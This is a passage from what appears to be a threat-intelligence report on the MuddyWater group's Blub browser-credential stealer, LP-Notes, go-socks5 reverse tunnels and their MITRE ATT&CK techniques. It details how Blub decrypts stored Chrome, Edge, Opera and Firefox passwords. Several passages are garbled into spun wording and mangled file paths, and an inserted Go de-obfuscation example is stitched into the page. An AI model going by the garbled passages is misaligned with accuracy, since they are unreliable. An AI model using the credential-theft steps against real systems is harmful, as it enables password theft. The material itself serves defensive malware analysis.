Similar to CE-Notes, LP-Notes then stores the encrypted credentials in a local file – in this case C:\Users\Public\Downloads\lp-notes.txt. As neither of these components has the capability to exfiltrate data, another component presumably handles this (either an RMM tool or MuddyViper).

Blub browser-data stealer

Blub is a C/C++ browser-data stealer incorporating a statically linked SQLite library. The identify is derived from its filename, Blub.exe. We noticed the PDB path C:Usersjojosourcereposstealerx64Releasestealer.pdb. It steals consumer login knowledge from Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera net browsers.

Chromium-based browsers

For Chrome, Blub first terminates chrome.exe (if operating) after which parses and decrypts the encryption key from C:CustomersAppDataLocalGoogleChromeUser DataLocal State. This secret is used to encrypt delicate knowledge saved by Chrome, akin to passwords or cookies, and it’s protected by the Knowledge Safety API (DPAPI) in order that it may solely be decrypted on the system the place it was initially encrypted. Blub decrypts this key through the CryptUnprotectData API, after which makes use of it to decrypt consumer credentials obtained from all current Chrome consumer profiles on the compromised pc. The credentials, saved in C:CustomersAppDataLocalGoogleChromeUser KnowledgeLogin Knowledge, are obtained through the next SQL question:

SELECT origin_url, username_value, password_value FROM logins

An analogous sequence of steps is used to acquire and decrypt consumer credentials from Microsoft Edge and Opera consumer profiles, utilizing the important thing obtained from C:CustomersAppDataLocalMicrosoftEdgeUser DataLocal State and C:CustomersAppDataRoamingOpera SoftwareOpera StableLocal State, respectively.

Firefox

Finally, to decrypt saved user credentials for Mozilla Firefox, Blub parses the hostname, encryptedUsername, and encryptedPassword values from the logins.json file in each user's profile directory, i.e., %APPDATA%\Mozilla\Firefox\Profiles. The credentials are then decrypted using the PK11SDR_Decrypt function from the nss3.dll library used by Firefox.

The collected data is saved into a local file named file.txt, with no encryption. The same data is logged to the console, with no encryption, along with verbose status messages. Blub has no capability to exfiltrate this file.

Note that Blub checks for running processes associated with security solutions before executing its malicious payload, focusing on the combination of afwServ.exe (Avast firewall) and AvastSvc.exe (Avast antivirus) processes. If afwServ.exe is detected running (but not AvastSvc.exe), Blub concludes that Norton (which now uses the Avast engine) is running on the compromised host, and exits. If AvastSvc.exe (Avast) is detected, Blub continues with the execution, except that it skips stealing credentials from Microsoft Edge.

While Blub's strings are stored in cleartext, a simple obfuscation technique is used for strings associated with the Google Chrome data stealer functionality. Specifically, several strings are concatenated into one long string, with 16 random characters between them, apparently to hide them from view during static analysis:

gdGlog}o{eRwjpw&”encrypted_key”:FAe[b-vcJvxGImpersonateLoggehgdOvlgt_NxuoolOpenProcessTokenVLUKKW’xxqjpwe}uDuplicateTokenExs5&}vleIpuvvkdXznx(Ghn2(sh|y⌂ryme~ds~

Removing the junk characters and splitting the strings returns:

  • “encrypted_key”:
  • ImpersonateLogge
  • OpenProcessToken
  • DuplicateTokenEx
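The split above can be automated during static analysis. The following Go example is added here (it is not the page's or Blub's code); it assumes the fixed 16-character filler and 16-character field layout that the four recovered strings suggest, and builds its own constructed sample blob rather than reusing the one printed above.

```go
package main

import (
	"fmt"
	"math/rand"
	"strings"
)

// Layout described for Blub's Chrome-related strings: every real string is
// preceded by junkLen filler characters. The four strings recovered on the
// page are all 16 characters wide, so fixed-width fields at a fixed stride are
// assumed here.
const (
	junkLen  = 16
	fieldLen = 16
)

// obfuscate builds a blob in that layout so the example has a reproducible,
// constructed sample; it is not Blub's code. Filler comes from a seeded PRNG.
func obfuscate(fields []string, seed int64) string {
	r := rand.New(rand.NewSource(seed))
	const filler = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{}[]()&|~^-_"
	var sb strings.Builder
	for _, f := range fields {
		if len([]rune(f)) != fieldLen {
			panic(fmt.Sprintf("field %q is not %d characters wide", f, fieldLen))
		}
		for i := 0; i < junkLen; i++ {
			sb.WriteByte(filler[r.Intn(len(filler))])
		}
		sb.WriteString(f)
	}
	return sb.String()
}

// deobfuscate walks the blob with stride junkLen+fieldLen, skipping the filler
// and keeping each fixed-width field. It works on runes because the blob on
// the page contains non-ASCII filler; a trailing partial field is dropped.
func deobfuscate(blob string) []string {
	runes := []rune(blob)
	var out []string
	for pos := junkLen; pos+fieldLen <= len(runes); pos += junkLen + fieldLen {
		out = append(out, string(runes[pos:pos+fieldLen]))
	}
	return out
}

func main() {
	fields := []string{`"encrypted_key":`, "ImpersonateLogge", "OpenProcessToken", "DuplicateTokenEx"}
	blob := obfuscate(fields, 1)
	fmt.Println(blob)
	for _, f := range deobfuscate(blob) {
		fmt.Println(" ", f)
	}
}
```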

go‑socks5 reverse tunnels

MuddyWater’s go‑socks5 reverse tunnels are a collection of Go-compiled tools, based on publicly available libraries such as go‑socks5, yamux, and resocks; they have been frequently used in MuddyWater’s recent campaigns.

Most of the variants we analyzed appear to be internally named ESETGO (no relation to ESET), based on the build configuration strings shown in Figure 9 and in other artifacts.

path  ESETGO
mod   ESETGO	(devel)
dep	  github.com/armon/go-socks5	v0.0.0-20160902184237-e75332964ef5	h1:0CwZNZbxp69SHPdPJAN/hZIm0C4OItdklCFmMRWYpio=
dep	  github.com/hashicorp/yamux	v0.1.1	h1:yrQxtgseBDrq9Y652vSRDvsKCJKOUD+GzTS4Y0Y8pvE=
dep	  golang.org/x/net	v0.29.0	h1:5ORfpBpCs4HzDYoodCDBbwHzdR5UrLBZ3sOnUJmFoHo=
dep	  golang.org/x/sys	v0.25.0	h1:r+8e+loiHxRqhXVl6ML1nO3l1+oFoWbnlu2Ehimmi34=
build -buildmode=exe
build -compiler=gc
build -ldflags="-w -s"
build CGO_ENABLED=1
build CGO_CFLAGS=
build CGO_CPPFLAGS=
build CGO_CXXFLAGS=
build CGO_LDFLAGS=
build GOARCH=amd64
build GOOS=windows
build GOAMD64=v1

Figure 9. Build configuration strings from MuddyWater’s go‑socks5 variants

The primary purpose of MuddyWater’s go‑socks5 proxy is to relay communication between the compromised machine (on a specific port) and a hardcoded C&C server, using a hardcoded connection key to authenticate with the C&C server via SSL/TLS. This setup allows the attacker to route C&C traffic (potentially related to other compromises) through the compromised machine and thus to hide the location of the real C&C server.

Conclusion

This campaign indicates an evolution in the operational maturity of MuddyWater. The deployment of previously undocumented components – such as the Fooder loader and MuddyViper backdoor – signals an effort to enhance stealth, persistence, and credential harvesting capabilities. The use of game-inspired evasion techniques, reverse tunneling, and a diversified toolset reflects a more refined approach than in earlier campaigns, even though traces of the group’s operational immaturity remain.

MuddyWater continues to demonstrate the ability to execute campaigns ranging from average to above average, i.e., being timely, effective, and increasingly challenging to defend against. While we assess that MuddyWater will remain a leading actor in Iranian-nexus activity, we anticipate a continued pattern of typical campaigns enhanced by more advanced TTPs.

ESET will continue to monitor the group’s activities, focusing on further signs of technical advancement and strategic targeting of government, military, telecommunications, and critical infrastructure.

ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.


MITRE ATT&CK techniques

This table was built using version 17 of the MITRE ATT&CK framework.

Reconnaissance
  T1591 Gather Victim Org Information – MuddyWater gathers victim org information to use in spearphishing emails.
Resource Development
  T1583 Acquire Infrastructure – MuddyWater uses acquired infrastructure to host malware download locations and C&C servers.
  T1608 Stage Capabilities – MuddyWater stages tools like RMM tools and data stealers on file-hosting sites such as OneHub and Mega Limited.
  T1587.001 Develop Capabilities: Malware – MuddyWater develops backdoors like MuddyViper and tools such as the Fooder loader, LP-Notes credential stealer, and the Blub and CE-Notes browser-data stealers.
  T1588.002 Obtain Capabilities: Tool – MuddyWater uses publicly available tools from GitHub, such as HackBrowserData and Go-based reverse proxies.
Initial Access
  T1566.002 Phishing: Spearphishing Link – MuddyWater uses spearphishing emails with links to file hosting sites like OneHub and Mega Limited to host RMM software (Atera, Level, and PDQ).
Execution
  T1059.001 Command-Line Interface: PowerShell – MuddyViper has the capability to open and execute PowerShell scripts.
  T1059.003 Command-Line Interface: Windows Command Shell – MuddyViper has the capability to provide the Windows Command shell as a reverse shell.
  T1559.001 Inter-Process Communication: Component Object Model – MuddyViper uses the ITaskService COM object to create a scheduled task for persistence.
  T1106 Native API – MuddyViper uses the CreateProcess API to execute additional files and commands.
  T1204.001 User Execution: Malicious Link – MuddyWater operators rely on targets clicking malicious links delivered via spearphishing.
Persistence
  T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – MuddyViper has the capability to copy itself to the victim's Startup folder.
  T1543.003 Create or Modify System Process: Windows Service – MuddyWater operators attempt to install RMM tools in %PROGRAMFILES%, which also includes creating a Windows service set to autostart.
  T1053 Scheduled Task/Job – MuddyViper can be persisted as a scheduled task named ManageOnDriveUpdater.
Defense Evasion
  T1134.001 Access Token Manipulation: Token Impersonation/Theft – The LP-Notes and CE-Notes tools attempt to impersonate a logged-on user's security context via ImpersonateLoggedOnUser.
  T1140 Deobfuscate/Decode Files or Information – Blub uses string obfuscation for storing stolen data. Fooder can extract embedded, AES-encrypted payloads. CE-Notes and LP-Notes both use a custom byte-wise decryption routine to decrypt strings.
  T1620 Reflective Code Loading – The Fooder loader performs reflective code loading to run additional tools (MuddyViper, reverse tunnels, and HackBrowserData).
  T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion – MuddyViper uses many calls to a sleep function to detect and avoid virtualization and analysis environments, and generally to inhibit dynamic analysis.
  T1027.007 Obfuscated Files or Information: Dynamic API Resolution – CE-Notes and LP-Notes perform dynamic API resolution by decrypting strings at runtime.
  T1134.002 Access Token Manipulation: Create Process with Token – Fooder's launcher attempts to duplicate the token of a process specified by the operator when launching Fooder via CreateProcessAsUserA.
  T1622 Debugger Evasion – MuddyViper searches for specific debugging tools, adjusting its behavior accordingly.
  T1070.009 Indicator Removal: Clear Persistence – MuddyViper can modify registry keys used for persistence, if instructed to uninstall itself.
  T1070.004 Indicator Removal: File Deletion – MuddyViper can delete itself from the system, if instructed to uninstall itself.
  T1036 Masquerading – Some versions of Fooder masquerade as an innocuous Snake game.
  T1036.004 Masquerading: Masquerade Task or Service – MuddyViper can create a task named ManageOnDriveUpdater.
  T1112 Modify Registry – MuddyViper can modify the HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup and HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup registry keys, to change the location of the Startup folder.
  T1027.009 Obfuscated Files or Information: Embedded Payloads – Fooder can extract an embedded, AES-encrypted payload.
  T1027.013 Obfuscated Files or Information: Encrypted/Encoded File – Fooder can extract an embedded, AES-encrypted payload.
Credential Access
  T1555.003 Credentials from Password Stores: Credentials from Web Browsers – CE-Notes and Blub attempt to steal credentials stored in browsers.
  T1056.002 Input Capture: GUI Input Capture – MuddyViper and LP-Notes have the ability to display a Windows security login prompt to capture login credentials and verify the credentials' veracity by relaying those credentials to legitimate Windows APIs.
Discovery
  T1082 System Information Discovery – MuddyViper collects system information from compromised systems and reports it back to the C&C server.
  T1518.001 Software Discovery: Security Software Discovery – MuddyViper attempts to get a process list of running applications, looks for security-related processes and, if found, reports them to the C&C server and modifies its behavior.
Collection
  T1074.001 Data Staged: Local Data Staging – Blub, CE-Notes, and LP-Notes stage stolen credentials on disk for MuddyViper, reverse tunnels, or RMM tools to collect and exfiltrate.
  T1560.001 Archive Collected Data: Archive via Utility – MuddyViper uses PowerShell's Compress-Archive command to compress browser data collected via the HackBrowserData utility.
Command and Control
  T1573.001 Encrypted Channel: Symmetric Cryptography – MuddyViper uses AES-CBC encryption to encrypt data before exchanging data with the C&C server.
  T1219 Remote Access Software – MuddyWater uses Atera, Level, and PDQ RMM tools for remote access to victims' systems.
  T1071.001 Application Layer Protocol: Web Protocols – MuddyViper uses HTTPS for C&C communications. The reverse tunnels use a mix of HTTP and HTTPS for C&C communications.
  T1105 Ingress Tool Transfer – MuddyViper has the capability to download additional payloads from its C&C server.
  T1001 Data Obfuscation – MuddyViper leverages HTTPS for C&C communications, using the Status header to hide a backdoor command ID in the server-to-client direction of the communication.
  T1090 Proxy – MuddyWater uses customized versions of go‑socks5 reverse proxy tools.
Exfiltration
  T1041 Exfiltration Over C2 Channel – MuddyWater tools exfiltrate data to C&C servers using C&C channels (HTTP and HTTPS).
  T1030 Data Transfer Size Limits – MuddyViper supports downloading/uploading files in chunks of limited size.
